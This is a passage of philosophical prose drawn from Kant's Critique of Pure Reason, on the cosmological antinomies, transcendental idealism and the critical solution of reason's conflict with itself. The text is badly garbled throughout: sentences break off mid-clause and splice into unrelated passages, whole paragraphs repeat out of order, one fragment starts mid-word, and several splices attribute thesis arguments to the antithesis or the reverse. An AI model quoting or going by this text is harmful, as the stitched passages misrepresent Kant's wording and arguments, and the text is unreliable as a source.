According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of magnitude in the [field of] appearance, applies also to all the others. The series of conditions is only to be met with in the regressive synthesis itself, not in the [field of] appearance, applies also to all the others. The series of conditions is only to be met with in the regressive synthesis itself, not in the [field of] appearance viewed as a thing given in and by itself, prior to all regress. We must therefore say that the number of parts in a given appearance is in itself neither finite nor infinite. For an appearance is not something existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness, either as finite or as infinite. This also holds of the series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. Being series of subordinated representations, they exist only in the dynamical regress, and prior to this regress can have no existence in themselves as self-subsistent series of things.

Thus the antinomy of pure reason in its cosmological ideas vanishes when it is shown that it is merely dialectical, and that it is a conflict due to an illusion which arises from our applying to appearances that exist only in our representations, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality.

This remark is of some importance. It enables us to see that the proofs given in the fourfold antinomy are not merely baseless deceptions. On the supposition that appearances, and the sensible world which comprehends them all, are things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. omposition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of natural appearances, on the other hand, much must remain uncertain and many questions insoluble, because what we know of nature is by no means sufficient, in all cases, to account for what has to be explained. The question, therefore, is whether in transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of extending knowledge to fasten it to transcendental ideas, through which we really know only that we know nothing); if, I say, the empiricist were satisfied with this, his principle would be a maxim urging moderation in our pretensions, modesty in our assertions, and yet at the same time the greatest possible extension of our understanding, through the teacher fittingly assigned to us, namely, through experience. If such were our procedure, we should not be cut off from employing intellectual presuppositions and faith on behalf of our practical interest; only they could never be permitted to assume the title and dignity of science and rational insight. Knowledge, which as such is speculative, can have no other object than that supplied by experience; if we transcend the limits thus imposed, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience, not as a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for the empirical regress, and therefore for any possible concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL CONFLICT OF REASON WITH ITSELF

The whole antinomy of pure reason rests upon the dialectical argument: If the conditioned is given, the entire series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in this experience, being mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of experience can never be determined save as conditioned.

These pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion has mocked them with a reality where none is to be found. This is the path which we shall now proceed to follow in the settlement of a dispute that defies all attempts to come to a decision.
* * *

Zeno of Elea, a subtle dialectician, was severely reprimanded by Plato as a mischievous Sophist who, to show his skill, would set out to prove a proposition through convincing arguments and then immediately overthrow them by other arguments equally strong. Zeno maintained, for example, that God (probably conceived by him as simply the world) is neither finite nor infinite. For an appearance is not something existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions, may perhaps rest on an empty and merely fictitious concept of the manner in which they are represented, as extended beings, or as series of alterations, have no independent existence outside our thoughts. This doctrine I entitle transcendental idealism. [I have also, elsewhere, sometimes entitled it formal idealism, to distinguish it from material idealism, that is, from the usual type of idealism which doubts or denies the existence of outer things themselves.] The realist, in the transcendental meaning of this term, treats these modifications of our sensibility as self-subsistent things, that is, treats mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between truth and dreams. As to the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in this experience, being mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience, are entitled objects. The non-sensible cause of these representations is completely unknown to us, and cannot therefore be intuited by us as object. For such an object would have to be represented as neither in space nor in time (these being merely conditions of sensible representation), and apart from such conditions we cannot think any intuition. We may, however, entitle the purely intelligible cause of appearances in general the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience. Accordingly, all events which have taken place in the immense periods that have preceded my own existence mean really nothing but the possibility of extending the chain of experience from the present perception back to the conditions which determine this perception in respect of time.

If, therefore, I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience, not as a thing in itself, the answer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but representations, and therefore, so far as they form a series, not otherwise than in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion, and deny that the world is a thing in itself, the contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of magnitude in the [field of] appearance viewed as a thing given in and by itself, prior to all regress. We must therefore say that the number of parts in a given appearance is in itself neither finite nor infinite, neither in motion nor at rest, neither similar nor dissimilar to any other thing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

